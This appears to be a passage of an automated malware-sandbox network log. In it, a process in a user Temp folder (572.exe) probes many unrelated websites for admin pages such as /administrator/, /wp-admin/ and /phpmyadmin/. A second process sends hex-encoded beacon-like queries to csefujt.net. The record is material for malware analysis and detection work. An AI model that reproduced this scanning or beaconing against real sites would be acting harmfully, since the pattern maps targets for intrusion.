Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
217 | 192.168.2.6 | 55637 | 172.67.184.59 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.519718885 CET | 170 | OUT | GET /admin.php HTTP/1.1
Host: hartico.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.647267103 CET | 669 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:51 GMT
Location: https://hartico.tv/admin.php
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k%2BrMLjtlwijSEEhdkaDEJLCFJPJmxlIIt000cHnrBEiO%2BgO6GVNVJifNOujpMnp8aANWpFAGp3ENovAPNJ1xYEEd65%2Bz%2FGhOJaJSRg3NC%2FvSf%2BQaBluXY1jXSuzwvg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb70588eb0b7-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
218 | 192.168.2.6 | 55646 | 104.26.14.180 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.519777060 CET | 180 | OUT | GET /admin HTTP/1.1
Host: aeaaamorim.inovarmais.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.651271105 CET | 1286 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:51 GMT
Location: https://aeaaamorim.inovarmais.com/admin
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZgabrWQpZ2Bi7xSD9KsgS%2BQp5LnyHWvzSlneJLw92puC5MT9jy4ONH%2FPn2ttmolIv7qabaZTfnXn3jzr%2BHZdGdjMqw3Gy2%2Bs7%2BUF5hfCa65oEVTebGMfaY9ezev3C8vU464c3vd%2BYbl1mfM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Report-To: {"endpoints":[{"url":"https:\/\/csp-reporting.cloudflare.com\/cdn-cgi\/script_monitor\/report?m=2_zS2z5q4IP7tdk7qutJxWjpICOi2ek42ItH8dNRCxE-1707131691-1-AT4rMnkuT1zb7YZii_QPAW-eqZcJ-Z9fULUlZXiabBSclL8GSHUUEf8zb6sPBocsTMDJDP1ghFbh1TP_mozmz2XDb9o8KYCV1JP0F5OsISgtTUURq7JbcSRWWeVqHJ44E4KLspFSpGK9CxSTn4nshVj0onxh_G8mO6NyZi0oJrmA"}],"group":"cf-csp-endpoint","max_age":86400}
Content-Security-Policy-Report-Only: script-src 'none'; connect-src 'none'; report-uri https://csp-reporting.cloudflare.com/cdn-cgi/script_monitor/report?m=2_zS2z5q4IP7tdk7qutJxWjpICOi2ek42ItH8dNRCxE-1707131691-1-AT4rMnkuT1zb7YZii_QPAW-eqZcJ-Z9fULUlZXiabBSclL8GSHUUEf8zb6sPBocsTMDJDP1ghFbh1TP_mozmz2XDb9o8KYCV1JP0F5Os
Data Raw:
Data Ascii:
Feb 5, 2024 12:14:51.651288033 CET | 176 | IN | Data Raw: 53 67 74 54 55 55 52 71 37 4a 62 63 53 52 57 57 65 56 71 48 4a 34 34 45 34 4b 4c 73 70 46 53 70 47 4b 39 43 78 53 54 6e 34 6e 73 68 56 6a 30 6f 6e 78 68 5f 47 38 6d 4f 36 4e 79 5a 69 30 6f 4a 72 6d 41 3b 20 72 65 70 6f 72 74 2d 74 6f 20 63 66 2d
Data Ascii: SgtTUURq7JbcSRWWeVqHJ44E4KLspFSpGK9CxSTn4nshVj0onxh_G8mO6NyZi0oJrmA; report-to cf-csp-endpointVary: Accept-EncodingServer: cloudflareCF-RAY: 850abb705e1e7bd6-ATL0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
219 | 192.168.2.6 | 55638 | 162.159.136.232 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.519778967 CET | 175 | OUT | GET /administrator/ HTTP/1.1
Host: discord.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.647284031 CET | 939 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:51 GMT
Location: https://discord.com/administrator/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FLjzAygHd1lJKQZQ3BuzGDSlKg3OMLyhEDZaM9yUC8Ytwfbn8LZqUA%2BrQAmfSzS1XJUCuUMaBm4hC%2Fdvei7f3kvJBxOQq6Ooyxht3TBQlpxZeDBiPReS%2BFt1w3Z1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=43d319574067941d37094b6910829d6525079fae-1707131691; path=/; domain=.discord.com; HttpOnly
Set-Cookie: _cfuvid=sVVx08cM5ITR7IypNv13N3eDZEkWIVe_dlzDoWncuYk-1707131691581-0-604800000; path=/; domain=.discord.com; HttpOnly
Server: cloudflare
CF-RAY: 850abb705845b163-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Feb 5, 2024 12:16:05.982156992 CET | 333 | OUT | GET /administrator/index.php HTTP/1.1
Host: discord.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cfruid=43d319574067941d37094b6910829d6525079fae-1707131691; _cfuvid=sVVx08cM5ITR7IypNv13N3eDZEkWIVe_dlzDoWncuYk-1707131691581-0-604800000
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
220 | 192.168.2.6 | 55645 | 104.21.34.34 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.519779921 CET | 187 | OUT | GET /administrator/index.php HTTP/1.1
Host: virtuadopt.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.647795916 CET | 687 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:51 GMT
Location: https://virtuadopt.com/administrator/index.php
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qyDG4HZ5GAdv2%2F5Wo5%2BuqN82Zj3XiQjTUl8%2FcGDQD1S0rO8vnytGKpzW0l8xOBOq62mGm6XutWXhWzb3Ju0SQVN%2FYHbxKNKnndxa0fjdVkfInALk9fXfoI310FCMViCQ1A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb705d5a69f8-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
221 | 192.168.2.6 | 55640 | 54.158.51.60 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.519794941 CET | 182 | OUT | GET /administrator/ HTTP/1.1
Host: ucv.blackboard.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.635493040 CET | 585 | IN | HTTP/1.1 301 Moved Permanently
Cache-control: no-cache="set-cookie"
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:14:51 GMT
Location: https://ucv.blackboard.com/administrator/
Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB7447B8839F065D505ACBA1ADA2DE0F271580654393A212BA35D0119823AFA8A307D569A0E8112D003B8DF13162B7579F233;PATH=/;MAX-AGE=900
Content-Length: 175
Connection: keep-alive
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>
Feb 5, 2024 12:16:05.981287003 CET | 346 | OUT | GET /administrator/index.php HTTP/1.1
Host: ucv.blackboard.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB7447B8839F065D505ACBA1ADA2DE0F271580654393A212BA35D0119823AFA8A307D569A0E8112D003B8DF13162B7579F233
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.097083092 CET | 373 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:06 GMT
Location: https://ucv.blackboard.com/administrator/index.php
Content-Length: 175
Connection: Close
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
222 | 192.168.2.6 | 55636 | 104.255.105.79 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.519890070 CET | 183 | OUT | GET /wp-admin/ HTTP/1.1
Host: signin.rockstargames.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.640607119 CET | 146 | IN | HTTP/1.0 302 Moved Temporarily
Location: https://signin.rockstargames.com/wp-admin/
Server: BigIP
Connection: Keep-Alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
223 | 192.168.2.6 | 55750 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.554579973 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:51.795129061 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
224 | 192.168.2.6 | 55704 | 20.192.98.160 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.556675911 CET | 196 | OUT | GET /administrator/index.php HTTP/1.1
Host: easygold.joyalukkas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.930661917 CET | 157 | IN | HTTP/1.1 301 Moved Permanently
Content-Length: 0
Date: Mon, 05 Feb 2024 11:14:50 GMT
Location: https://easygold.joyalukkas.com/administrator/index.php


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
225 | 192.168.2.6 | 55741 | 185.78.166.130 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.566637993 CET | 206 | OUT | GET /administrator/ HTTP/1.1
Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.918870926 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/administrator/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
226 | 192.168.2.6 | 55967 | 3.134.125.175 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.677671909 CET | 190 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: 3fba-180-252-166-236.ngrok.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.801002979 CET | 328 | IN | HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Location: https://3fba-180-252-166-236.ngrok.io/phpmyadmin/
Ngrok-Trace-Id: f24e88897525028b0fd80ce8076416da
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Length: 85
Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/phpmyadmin/">Temporary Redirect</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
227 | 192.168.2.6 | 55101 | 172.66.41.20 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.684639931 CET | 177 | OUT | GET /administrator/ HTTP/1.1
Host: yellosa.co.za
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.811126947 CET | 665 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:51 GMT
Location: https://yellosa.co.za/administrator/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CYxbFgPEarkqJIFgrkibREWr2BFoh%2B9uxRTVbuL14uzawQhNYdiT4v8JXPmKBbe8rKA4mHemftEK1vg1rn4xsOdtk9uxTNsJ57aCPmqmktHEm%2F1vxLBhvEOmLssQhJgM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb7159d6244c-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Feb 5, 2024 12:16:06.144879103 CET | 186 | OUT | GET /administrator/index.php HTTP/1.1
Host: yellosa.co.za
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.273452997 CET | 678 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:16:06 GMT
Location: https://yellosa.co.za/administrator/index.php
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=osISNzAUlZCo2ZshEYrfXwV0Jzku6j%2FxDRQ%2F3JvUyF2e2Ud2vseg2lkXi2DRazAzdCQ8%2FpvZHoiBFWfFz1CmtqDgzwBgBBGpyIqmNY8q1BarnftzYr5vPV1F9N%2FDJASj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd42baab244c-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                228192.168.2.656060192.185.5.2380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.705586910 CET234OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://multiideas.com/administrator/
Feb 5, 2024 12:14:51.809197903 CET | 226 | IN | HTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
229 | 192.168.2.6 | 55654 | 31.216.144.5 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.706136942 CET | 171 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.907372952 CET | 195 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://mega.nz
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
Feb 5, 2024 12:16:06.308068037 CET | 180 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.509330988 CET | 160 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
230 | 192.168.2.6 | 55790 | 162.241.203.30 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.706142902 CET | 234 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://nossoplayer.me/administrator/
Feb 5, 2024 12:14:51.814596891 CET | 226 | IN | HTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
231 | 192.168.2.6 | 55653 | 163.247.44.239 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.706393003 CET | 189 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.971647024 CET | 126 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://mitextoescolar.mineduc.cl/administrator/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
232 | 192.168.2.6 | 55702 | 181.4.228.155 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.706656933 CET | 186 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.975220919 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
Feb 5, 2024 12:14:51.975239038 CET | 151 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
233 | 192.168.2.6 | 55650 | 178.16.128.181 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.706717968 CET | 176 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mobilsam.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.900787115 CET | 1019 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 707
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://mobilsam.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                platform: hostinger
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
234 | 192.168.2.6 | 55651 | 77.240.114.212 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.706722975 CET | 176 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.922951937 CET | 443 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
